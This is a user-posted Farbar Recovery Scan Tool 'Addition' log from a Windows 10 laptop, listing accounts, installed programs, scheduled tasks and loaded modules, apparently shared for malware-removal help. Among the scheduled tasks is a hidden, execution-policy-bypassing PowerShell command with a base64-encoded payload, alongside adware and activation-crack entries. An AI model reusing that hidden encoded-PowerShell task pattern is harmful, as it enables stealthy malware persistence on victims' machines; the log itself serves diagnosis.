Addition
November 13, 2016 | Author: rrutayisire | Category: N/A
Short Description
A text describing the scan problem....
Description
Additional scan result of Farbar Recovery Scan Tool (x64) Version:05-03-2016 01 Ran by REVERIEN (2016-04-06 15:16:27) Running from C:\Users\REVERIEN\Desktop Windows 10 Home Version 1511 (X64) (2016-01-04 12:15:29) Boot Mode: Normal ========================================================== ==================== Accounts: ============================= Administrator (S-1-5-21-1240968423-981972810-3087361095-500 - Administrator - Di sabled) DefaultAccount (S-1-5-21-1240968423-981972810-3087361095-503 - Limited - Disable d) Guest (S-1-5-21-1240968423-981972810-3087361095-501 - Limited - Disabled) => C:\ Users\Guest HomeGroupUser$ (S-1-5-21-1240968423-981972810-3087361095-1003 - Limited - Enable d) REVERIEN (S-1-5-21-1240968423-981972810-3087361095-1001 - Administrator - Enable d) => C:\Users\REVERIEN ==================== Security Center ======================== (If an entry is included in the fixlist, it will be removed.) AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF4 6} AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF4 6} ==================== Installed Programs ====================== (Only the adware programs with "Hidden" flag could be added to the fixlist to un hide them. The adware programs should be uninstalled manually.) Adobe Flash Player 21 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 21 .0.0.197 - Adobe Systems Incorporated) Adobe Photoshop 7.0 CE (HKLM-x32\...\Adobe Photoshop 7.0 CE) (Version: 7.0 CE Adobe Systems, Inc.) Adobe Reader 9.4.0 (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-A94000000001}) (Versio n: 9.4.0 - Adobe Systems Incorporated) Adobe Shockwave Player 12.1 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.1 .7.157 - Adobe Systems, Inc.) 
Aloha TriPeaks (x32 Version: 2.2.0.98 - WildTangent) Hidden Apache Tomcat 6.0 (remove only) (HKLM\...\Apache Tomcat 6.0) (Version: - ) Apple Application Support (32-bit) (HKLM-x32\...\{649A1FD9-5892-46AD-8DF0-C4A43F F61CB7}) (Version: 4.1 - Apple Inc.) Apple Application Support (64-bit) (HKLM\...\{0DE0A178-AC7B-4650-806C-CF226DE037 66}) (Version: 4.1 - Apple Inc.) Apple Software Update (HKLM-x32\...\{FFD1F7F1-1AC9-4BC4-A908-0686D635ABAF}) (Ver sion: 2.1.4.131 - Apple Inc.) ArcGIS 10.1 for Desktop (HKLM-x32\...\ArcGIS 10.1 for Desktop) (Version: 10.1.30 35 - Environmental Systems Research Institute, Inc.) ArcGIS 10.1 for Desktop (x32 Version: 10.1.3035 - Environmental Systems Research Institute, Inc.) Hidden ArcGIS 10.1 License Manager (HKLM-x32\...\ArcGIS 10.1 License Manager) (Version: 10.1.2891 - Environmental Systems Research Institute, Inc.) ArcGIS 10.1 License Manager (x32 Version: 10.1.2891 - Environmental Systems Rese arch Institute, Inc.) Hidden Auslogics Duplicate File Finder (HKLM-x32\...\{6845255F-15CC-4DD1-94D5-D38F37011
8B3}_is1) (Version: 5.0.1.0 - Auslogics Labs Pty Ltd) Bejeweled 3 (x32 Version: 2.2.0.98 - WildTangent) Hidden Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Ap ple Inc.) BufferChm (x32 Version: 140.0.298.000 - Hewlett-Packard) Hidden Cambridge Advanced Learner's Dictionary (HKLM-x32\...\Cambridge Advanced Learner 's Dictionary) (Version: - ) Chuzzle Deluxe (x32 Version: 2.2.0.95 - WildTangent) Hidden D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden Destinations (x32 Version: 140.0.0.0 - Hewlett-Packard) Hidden DNS Unlocker version 1.4 (HKLM-x32\...\{E1527582-8509-4011-B922-29E3FB548882}_is 1) (Version: 1.4 - www.dnsunlocker.com) C:\Users\REVERIEN\AppData\ Local\Google\Update\1.3.28.1\psuser_64.dll => No File CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{71 DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\REVERIEN\AppData\L ocal\Microsoft\OneDrive\17.3.6302.0225\FileCoAuth.exe (Microsoft Corporation) CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{78 550997-5DEF-4A8A-BAF9-D5774E87AC98}\InprocServer32 -> C:\Users\REVERIEN\AppData\ Local\Google\Update\1.3.28.13\psuser_64.dll => No File CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{79 3EE463-1304-471C-ADF1-68C2FFB01247}\InprocServer32 -> C:\Users\REVERIEN\AppData\ Local\Google\Update\1.3.29.5\psuser_64.dll (Google Inc.) CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{82 0D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> C:\WINDOWS\system32\igfxEM. 
exe (Intel Corporation) CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{C3 BC25C0-FCD3-4F01-AFDD-41373F017C9A}\InprocServer32 -> C:\Users\REVERIEN\AppData\ Local\Google\Update\1.3.26.9\psuser_64.dll => No File CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{CC 182BE1-84CE-4A57-B85C-FD4BBDF78CB2}\InprocServer32 -> C:\Users\REVERIEN\AppData\ Local\Google\Update\1.3.29.1\psuser_64.dll => No File CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{D0 336C0B-7919-4C04-8CCE-2EBAE2ECE8C9}\InprocServer32 -> C:\Users\REVERIEN\AppData\ Local\Google\Update\1.3.25.11\psuser_64.dll => No File CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{D1 EDC4F5-7F4D-4B12-906A-614ECF66DDAF}\InprocServer32 -> C:\Users\REVERIEN\AppData\ Local\Google\Update\1.3.28.15\psuser_64.dll => No File CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{E8 CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\REVERIEN\AppData\ Local\Google\Update\1.3.29.5\psuser_64.dll (Google Inc.) CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{EC D97DE5-3C8F-4ACB-AEEE-CCAB78F7711C}\InprocServer32 -> C:\Users\REVERIEN\AppData\ Roaming\Dropbox\bin\DropboxExt64.34.dll (Dropbox, Inc.) CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{FB 314ED9-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\REVERIEN\AppData\ Roaming\Dropbox\bin\DropboxExt64.34.dll (Dropbox, Inc.) CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{FB 314EDA-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\REVERIEN\AppData\ Roaming\Dropbox\bin\DropboxExt64.34.dll (Dropbox, Inc.) CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{FB 314EDB-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\REVERIEN\AppData\ Roaming\Dropbox\bin\DropboxExt64.34.dll (Dropbox, Inc.) 
CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{FB 314EDC-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\REVERIEN\AppData\ Roaming\Dropbox\bin\DropboxExt64.34.dll (Dropbox, Inc.) CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{FB 314EDD-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\REVERIEN\AppData\ Roaming\Dropbox\bin\DropboxExt64.34.dll (Dropbox, Inc.) CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{FB 314EDE-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\REVERIEN\AppData\ Roaming\Dropbox\bin\DropboxExt64.34.dll (Dropbox, Inc.) CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{FB 314EDF-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\REVERIEN\AppData\ Roaming\Dropbox\bin\DropboxExt64.34.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{FB 314EE0-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\REVERIEN\AppData\ Roaming\Dropbox\bin\DropboxExt64.34.dll (Dropbox, Inc.) CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{FB C9D74C-AF55-4309-9FB2-C426E071637F}\InprocServer32 -> C:\Users\REVERIEN\AppData\ Roaming\Dropbox\bin\DropboxExt64.34.dll (Dropbox, Inc.) ==================== Scheduled Tasks (Whitelisted) ============= (If an entry is included in the fixlist, it will be removed from the registry. T he file will not be moved unless listed separately.) Task: {037C1E69-2352-4B71-BF9F-41F90E188F8F} - System32\Tasks\{B427AFCD-2507-455 E-962F-0A755643BDDC} => pcalua.exe -a C:\Users\REVERIEN\Downloads\setup_basic_48 00_14-5(1).exe -d C:\Users\REVERIEN\Downloads Task: {06652989-4F08-4C22-9929-45FEAD589085} - System32\Tasks\{8B398634-E508-401 C-8F40-1E6B8018FAF9} => Firefox.exe hxxp://www.skype.com/go/downloading?source=l ightinstaller&ver=5.3.0.111.259&LastError=404 Task: {08F320F2-51C3-40FA-901E-6299F4ED245D} - System32\Tasks\Toshiba\CommonNoti fier => C:\Program Files (x86)\Toshiba TEMPRO\Toshiba.Tempro.UI.CommonNotifier.e xe [2013-01-04] (Toshiba Europe GmbH) Task: {1B3DA511-80EE-4124-9D8C-4214B6F9F7C7} - System32\Tasks\Trigger KMS Activa tion => C:\Program Files\KMSnano\TriggerKMS.exe [2013-01-26] () Task: {1B690D77-BED4-4BD3-87B3-77B30470B172} - System32\Tasks\{335127B4-0212-47B 8-A6F6-BB6DFEC8DC4C} => pcalua.exe -a C:\Users\REVERIEN\Documents\Downloads\Prog rams\pdf-annotator-5.exe -d C:\Users\REVERIEN\Documents\Downloads\Programs Task: {1C4D72AE-A136-44B9-AB6D-618DC414022A} - System32\Tasks\LaunchPreSignup => C:\Program Files (x86)\OLBPre\OLBPre.exe Firefox.exe hxxp://www.skype.com/go/downloading?source=l ightinstaller&ver=5.3.0.111.259&LastError=404 Task: {435AE71D-CBDE-4DDF-A504-6D7A8DC77019} - System32\Tasks\Adobe Flash Player Updater => 
C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [201 6-03-24] (Adobe Systems Incorporated) Task: {4754F53F-BCD6-4CEB-AE31-E3D1081F2919} - System32\Tasks\RealDownloader Upd ate Check => C:\Program Files (x86)\RealNetworks\RealDownloader\downloader2.exe [2016-02-03] () Task: {4899038C-645F-4F99-B06E-C6C53E90E8E8} - System32\Tasks\GoogleUpdateTaskUs erS-1-5-21-1240968423-981972810-3087361095-1001UA => C:\Users\REVERIEN\AppData\L ocal\Google\Update\GoogleUpdate.exe [2015-08-28] (Google Inc.) Task: {4D2B6648-C88F-42D0-801A-2BC13B0D4419} - System32\Tasks\Microsoft\Windows\ Setup\8.1 auto install ping => C:\Windows\system32\AutoUpdate.exe Task: {52FC6D96-0F79-4D7F-9016-C45F51E68844} - System32\Tasks\{B4A54807-95C1-4C5 6-AD99-3A2CF5B1A653} => pcalua.exe -a C:\Users\REVERIEN\Documents\Downloads\Prog rams\setup_basic_4800_14-5_2.exe -d C:\Users\REVERIEN\AppData\Roaming\IDM Task: {57B2A906-6471-42D9-813A-6ECC1BB8FE03} - System32\Tasks\Microsoft\Windows\ RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2016-03-15] (Microsoft Corpo ration) Task: {620EA6A0-7874-4884-8744-C548E5709A0F} - System32\Tasks\Microsoft\Office\O fficeTelemetryAgentLogOn => C:\Program Files\Microsoft Office\Office15\msoia.exe [2014-01-22] (Microsoft Corporation) Task: {698FBBBE-2414-4D8D-8C84-3409AD2E7EE0} - System32\Tasks\RealDownloaderReal UpgradeLogonTaskS-1-5-21-1240968423-981972810-3087361095-1001 => C:\Program File s (x86)\RealNetworks\RealDownloader\RealUpgrade.exe [2016-02-03] (RealNetworks, Inc.) Task: {7194F166-8483-4E63-B348-4665129E173B} - System32\Tasks\Microsoft\Windows\ Setup\8.1 auto install v2 => C:\WINDOWS\system32\AutoUpdate.exe Task: {71B218C2-3599-478E-A2FD-5AD8943CB636} - System32\Tasks\{B7687898-7A46-489 6-A5EA-EF2E5B2F59D6} => pcalua.exe -a G:\RRutayis\Pavilion\Softwares\setup_basic _4800.exe -d G:\RRutayis\Pavilion\Softwares
Task: {7224D3F7-19A1-42EC-BECA-439673C57A55} - System32\Tasks\Microsoft\Office\O ffice 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Share d\Office15\OLicenseHeartbeat.exe Task: {74DE945E-A8A9-46D9-B7C6-43D6200BA2FF} - System32\Tasks\AutoKMS => C:\WIND OWS\AutoKMS\AutoKMS.exe [2016-04-02] () Task: {7D852E04-7098-426F-97C2-C15FEBB19066} - System32\Tasks\{E0A32E87-8F44-4B7 3-8A8D-7619716B55C8} => Firefox.exe hxxp://www.skype.com/go/downloading?source=l ightinstaller&ver=5.3.0.111.259&LastError=404 Task: {86BE8531-BCDB-49B1-BB53-F1B51B1F2651} - System32\Tasks\Microsoft\Office\O fficeTelemetryAgentFallBack => C:\Program Files\Microsoft Office\Office15\msoia. exe [2014-01-22] (Microsoft Corporation) Task: {86F486B0-1990-4CFA-8DC2-329407DD0A02} - System32\Tasks\DropboxUpdateTaskU serS-1-5-21-1240968423-981972810-3087361095-1001Core => C:\Users\REVERIEN\AppDat a\Local\Dropbox\Update\DropboxUpdate.exe [2015-08-21] (Dropbox, Inc.) Task: {872982BD-00DC-422F-B1CE-6E49E2B5AB8D} - System32\Tasks\Synaptics TouchPad Enhancements => Program Files\Synaptics\SynTP\SynTPEnh.exe Task: {8FE78DF6-0309-4FB0-B487-BF13C767D48D} - System32\Tasks\DNSWALTERS => C:\P rogram Files (x86)\DNS Unlocker\dnswalters.exe [2016-02-28] () C:\Program Files (x86)\RealNetworks\RealDownloader\RealUpgrade.exe [2016-02-03] (RealNetwor ks, Inc.) Task: {9FA8A24B-5779-4D13-ABBD-0AEA47FDA1C1} - System32\Tasks\Apple\AppleSoftwar eUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2015 -08-27] (Apple Inc.) Task: {A6597B70-BC68-4E4E-9418-E07ADAB6CD49} - System32\Tasks\TOSHIBA\Service St ation => C:\Program Files\TOSHIBA\Toshiba Service Station\ToshibaServiceStation. exe [2012-07-27] (TOSHIBA Corporation) Task: {A6A1D5E0-2A0D-4605-8355-ED76B01EE13A} - System32\Tasks\GoogleUpdateTaskMa chineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-03-18] (G oogle Inc.) 
Task: {A7B29358-293E-4C2F-B46F-0E6B97C3127C} - System32\Tasks\MySQLNotifierTask => C:\Program Files (x86)\MySQL\MySQL Notifier 1.1\MySQLNotifier.exe [2014-09-03 ] (Oracle Corporation) Task: {B00C6F1F-19F7-4CC1-9F4F-90B9FCC800B9} - System32\Tasks\GoogleUpdateTaskUs erS-1-5-21-1240968423-981972810-3087361095-1001Core => C:\Users\REVERIEN\AppData \Local\Google\Update\GoogleUpdate.exe [2015-08-28] (Google Inc.) Task: {B03DB1DA-0393-410C-AA42-6251752AE6FD} - System32\Tasks\MySQL\Installer\Ma nifestUpdate => C:\Program Files (x86)\MySQL\MySQL Installer for Windows\MySQLIn stallerConsole.exe [2015-08-20] (Oracle Corporation) Task: {BFE355E8-32FA-4BD6-A3F7-D792E36D5785} - System32\Tasks\DropboxUpdateTaskU serS-1-5-21-1240968423-981972810-3087361095-1001UA => C:\Users\REVERIEN\AppData\ Local\Dropbox\Update\DropboxUpdate.exe [2015-08-21] (Dropbox, Inc.) Task: {C238B4A8-4D88-4DDD-B77A-77590C626E69} - System32\Tasks\{2574E1B5-210F-414 9-B661-A7C1B5BE2AEC} => Firefox.exe hxxp://www.skype.com/go/downloading?source=l ightinstaller&ver=5.3.0.111.259&LastError=404 Task: {D96737D8-8E0D-49DB-9B1D-DABEBEB00626} - System32\Tasks\{0E0E7947-0D0D-090 5-0D11-0D087A0D110A} => powershell.exe -nologo -executionpolicy bypass -noninter active -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByA GUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDA G8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzA GMAOwAkAFAAcgBvAGcA (the data entry has 9416 more characters). 
Task: {DA4CFD73-5939-4F16-A5D5-2F25F0354A4E} - System32\Tasks\{71C07501-74AE-CA4 7-A919-ECBA39E73D0C} => C:\WINDOWS\system32\regsvr32.exe [2015-10-30] (Microsoft Corporation) Task: {DF2B3ACD-B3A9-44E0-A1F7-78CFF05EE2E5} - System32\Tasks\{D2750D47-E820-40A 5-94CA-A5BAEEC0E056} => Firefox.exe hxxp://www.skype.com/go/downloading?source=l ightinstaller&ver=5.3.0.111.259&LastError=404 Task: {DF39BBDD-F0B3-4FAD-ABF1-F2A8B63CA7CC} - System32\Tasks\GoogleUpdateTaskMa chineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-03-18]
(Google Inc.)
Task: {F22B8338-9644-4660-BE5D-D422066ECD42} - System32\Tasks\RealDownloaderDownloaderScheduledTaskS-1-5-21-1240968423-981972810-3087361095-1001 => C:\Program Files (x86)\RealNetworks\RealDownloader\recordingmanager.exe [2016-02-03] (RealNetworks, Inc.)
Task: {F29AEFCF-3872-459A-BE83-E74679F989F2} - System32\Tasks\ReimageUpdater => C:\Program Files\Reimage\Reimage Protector\ReiGuard.exe [2015-08-19] (Reimage®)
C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\WINDOWS\Tasks\DropboxUpdateTaskUserS-1-5-21-1240968423-981972810-3087361095-1001Core.job => C:\Users\REVERIEN\AppData\Local\Dropbox\Update\DropboxUpdate.exe
Task: C:\WINDOWS\Tasks\DropboxUpdateTaskUserS-1-5-21-1240968423-981972810-3087361095-1001UA.job => C:\Users\REVERIEN\AppData\Local\Dropbox\Update\DropboxUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-1240968423-981972810-3087361095-1001Core.job => C:\Users\REVERIEN\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-1240968423-981972810-3087361095-1001UA.job => C:\Users\REVERIEN\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\Synaptics TouchPad Enhancements.job => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
Task: C:\WINDOWS\Tasks\WebReg .job => C:\Program Files (x86)\HP\Digital Imaging\bin\hpqwrg.exe
==================== Shortcuts =============================
(The entries could be listed to be restored or removed.)
ShortcutWithArgument: C:\Users\Public\Desktop\Quantum GIS Desktop (1.8.0).lnk -> C:\Program Files (x86)\Quantum GIS Lisboa\bin\nircmd.exe (NirSoft) -> exec hide "C:\Program Files (x86)\Quantum GIS Lisboa\bin\qgis.bat"
==================== Loaded Modules (Whitelisted) ==============
2011-10-13 15:38 - 2011-10-13 15:38 - 00156672 _____ () C:\Program Files (x86)\TOSHIBA\Password Utility\GFNEXSrv.exe
2014-12-24 17:10 - 2014-08-06 03:04 - 01441792 _____ () C:\Program Files\Everything\Everything.exe
2016-03-11 20:25 - 2013-11-15 14:38 - 00066048 _____ () C:\Program Files (x86)\REALTEK\Realtek Bluetooth\BTDevMgr.exe
2015-09-18 17:53 - 2015-09-18 17:53 - 13067264 _____ () C:\Program Files\MySQL\MySQL Server 5.6\bin\mysqld.exe
2016-02-03 18:49 - 2016-02-03 18:49 - 00032544 _____ () C:\Program Files (x86)\Real\UpdateService\RealPlayerUpdateSvc.exe
2015-08-19 10:56 - 2015-08-19 10:56 - 06908904 _____ () C:\Program Files\Reimage\Reimage Protector\ReiSystem.exe
2015-10-30 09:18 - 2015-10-30 09:18 - 00185856 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
2016-03-02 19:05 - 2016-02-23 13:27 - 02654872 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2016-03-02 19:05 - 2016-02-23 13:27 - 02654872 _____ () C:\WINDOWS\System32\Core UIComponents.dll 2015-10-13 15:07 - 2015-10-13 15:07 - 08901184 _____ () C:\Program Files\Microso ft Office\Office15\1033\GrooveIntlResource.dll 2016-01-05 11:44 - 2015-12-07 06:14 - 00093696 _____ () C:\Windows\SystemApps\Sh ellExperienceHost_cw5n1h2txyewy\Windows.UI.Shell.SharedUtilities.dll 2016-03-02 19:05 - 2016-02-23 10:36 - 00472064 _____ () C:\Windows\SystemApps\Sh ellExperienceHost_cw5n1h2txyewy\QuickActions.dll 2015-10-21 10:47 - 2007-07-18 16:15 - 00020480 _____ () C:\Windows\System32\spoo l\drivers\x64\3\WrtMon.exe 2016-02-08 22:38 - 2016-02-08 22:38 - 01110048 _____ () C:\Users\REVERIEN\AppDat a\Local\MalwareProtectionLive\MalwareProtectionClient.exe 2016-03-16 12:25 - 2016-02-28 11:46 - 00678912 _____ () C:\Program Files (x86)\D NS Unlocker\dnswalters.exe 2016-02-02 09:38 - 2016-02-03 11:58 - 00144384 _____ () C:\Program Files\Windows Apps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkypeHost.exe 2016-03-29 22:12 - 2016-03-31 10:07 - 00016896 _____ () C:\Program Files\Windows Apps\Microsoft.Windows.Photos_16.325.12390.0_x64__8wekyb3d8bbwe\Microsoft.Photos .exe 2016-03-29 22:12 - 2016-03-31 10:07 - 17535488 _____ () C:\Program Files\Windows Apps\Microsoft.Windows.Photos_16.325.12390.0_x64__8wekyb3d8bbwe\Microsoft.Photos .dll 2016-03-04 12:16 - 2016-03-04 12:16 - 00291328 _____ () C:\Program Files\Windows Apps\Microsoft.Windows.Photos_16.325.12390.0_x64__8wekyb3d8bbwe\StoreRatingPromo tion.dll 2015-04-08 13:39 - 2015-04-08 13:39 - 00468480 _____ () C:\Program Files (x86)\M endeley Desktop\MendeleyWordPlugin.exe 2016-02-03 18:00 - 2016-02-03 18:00 - 00712432 _____ () C:\Program Files (x86)\R ealNetworks\RealDownloader\downloader2.exe 2016-01-13 13:53 - 2016-01-05 03:29 - 07992832 _____ () C:\Windows\SystemApps\Mi crosoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll 2016-01-13 13:53 - 2016-01-05 03:23 - 00591360 _____ () C:\Windows\SystemApps\Mi 
crosoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll 2016-02-03 16:21 - 2016-01-16 07:10 - 02483200 _____ () C:\Windows\SystemApps\Mi crosoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll 2016-02-03 16:21 - 2016-01-16 07:13 - 04089856 _____ () C:\Windows\SystemApps\Mi crosoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll 2016-02-03 18:48 - 2016-02-03 18:48 - 00037688 _____ () C:\Program Files (x86)\R eal\UpdateService\DL2UpdatePlugin.dll 2016-02-03 18:48 - 2016-02-03 18:48 - 00039224 _____ () C:\Program Files (x86)\R eal\UpdateService\RealDownloaderUpdatePlugin.dll 2016-02-03 18:49 - 2016-02-03 18:49 - 00037192 _____ () C:\Program Files (x86)\R eal\UpdateService\VideoDLUpdatePlugin.dll 2013-03-28 07:14 - 2012-06-25 12:41 - 01198912 _____ () C:\Program Files (x86)\I ntel\Intel(R) Management Engine Components\UNS\ACE.dll 2016-02-03 18:00 - 2016-02-03 18:00 - 00077552 _____ () C:\Program Files (x86)\R ealNetworks\RealDownloader\dtvhooks.dll 2016-02-29 20:12 - 2016-02-29 20:12 - 00089328 _____ () c:\program files (x86)\r eal\realplayer\CrashRpt\CrashRpt1402.dll 2016-02-29 20:09 - 2016-02-29 20:09 - 00022288 _____ () c:\program files (x86)\r eal\realplayer\RPDS\Tools\ffmpeg\mediautil.dll 2016-02-29 20:09 - 2016-02-29 20:09 - 04274960 _____ () c:\program files (x86)\r eal\realplayer\RPDS\Tools\ffmpeg\avcodec-55.dll 2016-02-29 20:09 - 2016-02-29 20:09 - 01520912 _____ () c:\program files (x86)\r eal\realplayer\RPDS\Tools\ffmpeg\avformat-55.dll 2016-02-29 20:09 - 2016-02-29 20:09 - 00322832 _____ () c:\program files (x86)\r eal\realplayer\RPDS\Tools\ffmpeg\avutil-52.dll 2016-04-06 09:29 - 2016-04-06 09:29 - 00098816 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\win32api.pyd 2016-04-06 09:29 - 2016-04-06 09:29 - 00110080 _____ () C:\Users\REVERIEN\AppDat
a\Local\Temp\_MEI56922\pywintypes27.dll 2016-04-06 09:29 - 2016-04-06 09:29 - 00364544 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\pythoncom27.dll 2016-04-06 09:29 - 2016-04-06 09:29 - 00320512 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\win32com.shell.shell.pyd 2016-04-06 09:29 - 2016-04-06 09:29 - 00776704 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\_hashlib.pyd 2016-04-06 09:30 - 2016-04-06 09:30 - 01176576 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\wx._core_.pyd 2016-04-06 09:30 - 2016-04-06 09:30 - 00806400 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\wx._gdi_.pyd 2016-04-06 09:30 - 2016-04-06 09:30 - 00816128 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\wx._windows_.pyd 2016-04-06 09:30 - 2016-04-06 09:30 - 01067008 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\wx._controls_.pyd 2016-04-06 09:30 - 2016-04-06 09:30 - 00733184 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\wx._misc_.pyd 2016-04-06 09:29 - 2016-04-06 09:29 - 00682496 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\pysqlite2._sqlite.pyd 2016-04-06 09:29 - 2016-04-06 09:29 - 00088064 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\_ctypes.pyd 2016-04-06 09:29 - 2016-04-06 09:29 - 00119808 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\win32file.pyd 2016-04-06 09:30 - 2016-04-06 09:30 - 00108544 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\win32security.pyd 2016-04-06 09:29 - 2016-04-06 09:29 - 00007168 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\hashobjs_ext.pyd 2016-04-06 09:29 - 2016-04-06 09:29 - 00017920 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\thumbnails_ext.pyd 2016-04-06 09:29 - 2016-04-06 09:29 - 00088064 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\usb_ext.pyd 2016-04-06 09:29 - 2016-04-06 09:29 - 00167936 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\win32gui.pyd 2016-04-06 09:29 - 2016-04-06 09:29 - 
00018432 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\win32event.pyd 2016-04-06 09:29 - 2016-04-06 09:29 - 00046080 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\_socket.pyd 2016-04-06 09:29 - 2016-04-06 09:29 - 01208320 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\_ssl.pyd 2016-04-06 09:29 - 2016-04-06 09:29 - 00128512 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\_elementtree.pyd 2016-04-06 09:29 - 2016-04-06 09:29 - 00127488 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\pyexpat.pyd 2016-04-06 09:29 - 2016-04-06 09:29 - 00013824 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\common.time34.pyd 2016-04-06 09:29 - 2016-04-06 09:29 - 00038912 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\win32inet.pyd 2016-04-06 09:29 - 2016-04-06 09:29 - 00036864 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\_psutil_windows.pyd 2016-04-06 09:30 - 2016-04-06 09:30 - 00525208 _____ () C:\Users\REVERIEN\AppDat a\Local\Temp\_MEI56922\windows._lib_cacheinvalidation.pyd 